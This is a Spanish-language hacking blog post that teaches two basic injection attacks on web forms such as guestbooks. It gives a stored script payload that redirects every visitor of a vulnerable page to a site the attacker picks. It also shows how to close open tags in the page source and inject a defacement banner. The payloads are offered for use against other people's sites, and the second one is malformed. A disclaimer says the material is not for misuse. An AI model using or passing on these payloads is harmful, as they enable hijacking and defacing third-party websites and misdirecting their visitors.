May
6
Injection HTML
CategorÃas: Comenzando, General, Hacking Web, Vulnerabilidades |
Enviado por: rush
(16 artÃculos) |
Bueno aqui veremos 2 injectiones muy vasicas.
Primera injection:
Para hacer esta injection o ataque tenemos que saber si tiene el HTML activa para esto podemos ejecutar algun codigo HTML Como: <h2>rush</h2>Si vemos que cambia la letra o se hace mas grande de lo normal entonces el HTML esta activado, otra forma simple de saber es viendo como se ejecuta el post, por ejemplo si utilizan etiquetas <quote>texto</quote> <code>texto</code> entre otras nos daremos cuenta.
el siguiente paso es hacer una injection usando este codigo:
<script>window.location=’http://www.rush.com’;</script>
En dond dice rush cambiaremos eso por la web que quieres poner como pagina principal.
Segunda injection.
Aora tenemos que hacer lo mismo postear <h2>rush<h2> para ver si es vulnerable, pero vemos que no sirvio el codigo, no te preocupes no afuersa tiene que salir el codigo HTML y no sea vulnerable aora lo que vamos a hacer es ver el codigo de fuente.
<table border=”0″ width=”94%” cellspacing=”1″>
<tr>
<td width=”20%”><font face=”Arial” color=”black”><strong>Nombre:</strong></font></td>
<td width=”80%”><font color=”black”></font></td>
</tr>
<tr>
<td width=”20%”><font face=”Arial” color=”black”><strong>E-Mail:</strong></font></td>
<td width=”80%”><font color=”black”>@</font></td>
</tr>
<tr>
<td width=”20%”><font face=”Arial” color=”black”><strong>Localidad:</strong></font></td>
<td width=”80%”><font color=”black”></font></td>
</tr>
<tr>
<td width=”20%”><font face=”Arial” color=”black”><strong>Homepage:</strong></font></td>
<td width=”80%”><font color=”black”><a href=”http://<>”> </a></font></td>
</tr>
<tr>
<td width=”20%”><font face=”Arial” color=”black”><strong>Me encontr� en:</strong></font></td>
<td width=”80%”><font color=”black”>en GaliciaCity</font></td>
</tr>
<tr>
<td width=”20%”><font face=”Arial” color=”black”><strong>Me punt�a con:</strong></font></td>
<td width=”80%”><font color=”black”>10</font></td>
</tr>
<tr>
<td width=”20%” valign=”top”><font face=”Arial” color=”black”><strong>Comentarios:</strong></font></td>
<td width=”80%”><font color=”black”></font></td>
</tr>
y vemos:
<td width=”20%”><font face=”Arial” color=”black”><strong>Homepage:</strong></font></td>
<td width=”80%”><font color=”black”><a href=”http://<>”> </a></font></td>
</tr>
ay vemos que ay algunos codigos aviertos, tenemos que cerrarlos con </a></font><td>.
y aora usaremos esta injectio:
<a hrfe=”http://www.rush.com”</a></font></td><h1>hackebyrUsH</a></font></td>
y eso es todo solo tenemos que fijarnos en que etiquetas tenemos que cerra.
by: rUsH
Últimas entradas:
- Trucos de windows XP
- Internet Explorer 8 será instalado automáticamente
- Explotando Exploit PHP
- Explicion de puertos y como cerrarlos
- Phising y Pharming
- Como Hackear una red wifi.
- Como guardar un sitio web con teleport by rush.
- Hacker se manifiesta en la web de la camara diputados de mexico.
- Que es el phishing?
- Funcionamiento y prevencion de VIRUS!
Tienes que estar conectado para postear.
Importante!
Los autores de este blog pretenden informar sobre seguridad, vulnerabilidades, técnicas hack, hablar sobre lo último en hacking...
Las herramientas, trucos, comandos, artÃculos... explicados en este blog NUNCA deberán
ser usados de forma maligna para delinquir o dañar a terceros.
No nos hacemos responsables de la mala interpretación ni del mal uso
de cualquier contenido del blog.
Todo lo que se habla en este blog está en internet (o proviene de alguno de los autores) y se puede consultar de forma libre. Si obtienes información de este blog para tu espacio, página web, blog... no olvides ponernos como fuente :).Acerca de
El Blog del Hacker es una web llevada por usuarios de ForoHack.com perteneciente a la web ElHacker.com
Si quieres colaborar con nosotros lo puedes hacer de forma abierta en nuestros foros y siendo un usuario frecuente podrás ser Autor de este blog.
El objetivo principal de este blog es dar a conocer desde nuestro propio punto de vista el hacking en la red para Windows o Linux, conocer como funcionan las cosas, hacer más segura la red encontrando vulnerabilidades,... nunca para hacer el mal, estafar, ni nada parecido. Siempre de buen rollo =) Cuanto más se hable de forma abierta sobre estos temas más usuarios y empresas los conocerán y menos nos afectarán (será más segura la red)Últimos Comentarios
- Phising y Pharming
12/22/2008 07:39 pm
27 Comentarios - Que es un deface o defacing
10/09/2008 06:40 am
37 Comentarios - Como Hackear una red wifi.
09/15/2008 09:26 am
40 Comentarios - The Mentor, Manifiesto de un Hacker.
09/14/2008 10:21 pm
20 Comentarios - Abierto el registro en el Blog
09/04/2008 07:06 pm
5 Comentarios - iPhone Propaga Virus
08/21/2008 07:04 am
5 Comentarios - Que es el phishing?
08/17/2008 12:48 pm
7 Comentarios - Super usuario dentro de Linux
06/24/2008 06:59 pm
6 Comentarios
Entradas más populares
- Phising y Pharming
Feeds e Información
